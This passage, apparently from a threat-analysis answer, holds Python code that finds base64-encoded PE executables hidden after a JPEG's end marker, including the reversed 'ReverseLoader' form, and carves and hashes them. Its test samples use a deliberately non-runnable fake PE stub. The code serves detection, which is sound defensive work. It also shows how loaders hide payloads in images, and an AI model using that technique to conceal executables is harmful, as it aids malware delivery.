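    """Return one finding per base64 run that decodes, as-is or reversed, to a PE."""
    findings = []
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        for orientation, candidate in (("forward", run), ("reversed", run[::-1])):
            pe = try_b64(candidate)
            if pe is not None and looks_like_pe(pe):
                findings.append({
                    "offset": m.start(),          # where the encoded run sits in the file
                    "orientation": orientation,   # "reversed" is the ReverseLoader pattern
                    "encoded_len": len(run),
                    "payload": pe,                # carved PE bytes, ready to hash or detonate
                    "sha256": hashlib.sha256(pe).hexdigest(),
                })
                break  # a run decodes one way or the other, not both
    return findings


def build_fake_pe() -> bytes:
    """Constructed 68-byte stand-in for a PE: DOS header, e_lfanew = 0x40, 'PE\\0\\0'.
    It only satisfies looks_like_pe(); it is not a real or runnable executable."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0"


FAKE_PE = build_fake_pe()
# Constructed minimal JPEG: SOI, APP0/JFIF segment, a little filler, EOI.
JPEG_STUB = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + bytes(32) + b"\xff\xd9")
# Two constructed "stego" images: payload appended after EOI as plain base64,
# and as the same base64 string reversed character by character.
SAMPLE_FORWARD = JPEG_STUB + base64.b64encode(FAKE_PE)
SAMPLE_REVERSED = JPEG_STUB + base64.b64encode(FAKE_PE)[::-1]


if __name__ == "__main__":
    for name, sample in (("clean", JPEG_STUB),
                         ("forward", SAMPLE_FORWARD),
                         ("reversed", SAMPLE_REVERSED)):
        hits = find_embedded_pe(sample)
        print(f"{name}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  offset={h['offset']} {h['orientation']} "
                  f"encoded_len={h['encoded_len']} sha256={h['sha256']}")
```

Run it against the real `pic.jpg` from the report by passing the file's bytes to `find_embedded_pe`; the `sha256` of the carved payload is what you would pivot on, since the image hash changes every time the actor re-encodes the same PE. The `e_lfanew` bounds check matters: a run that happens to start with `TVo`/`TVq` decodes to bytes beginning with `MZ`, and without the `PE\0\0` confirmation that alone would be a noisy signal on large images.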
No debug info